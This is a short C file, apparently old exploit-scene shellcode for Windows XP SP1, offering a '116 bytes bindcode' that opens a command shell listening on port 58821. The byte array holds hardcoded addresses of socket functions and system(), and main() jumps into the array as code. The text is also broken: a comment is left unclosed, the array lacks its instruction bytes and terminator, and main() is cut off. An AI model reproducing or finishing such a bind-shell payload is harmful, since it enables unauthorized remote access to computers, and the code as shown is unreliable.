/* 116 bytes bindcode hardcoded for Windows XP SP1 */
/* but you can change the address if you want */
/* i made it pretty clear where they are  */
/* the bindcode will bind to port 58821 */
/* by silicon / [email protected] */
/* greetz to dtors.net :)

#include <stdio.h>
#include <winsock2.h>

unsigned char bindcode[] = // 116 bytes bindcode for windows, port=58821, by silicon :)
"\x01\x5A\xAB\x71" // address of WSASocketA()
"\xCE\x3E\xAB\x71" // address of bind()
"\xE2\x5D\xAB\x71" // address of listen()
"\x8D\x86\xAB\x71" // address of accept()
"\x1D\x20\xE8\x77" // address of SetStdHandle()
"\x44\x80\xC2\x77" // address of system()

int main(){
 WSADATA wsadata;
 ((void (*)(void)) &bindcode)(); 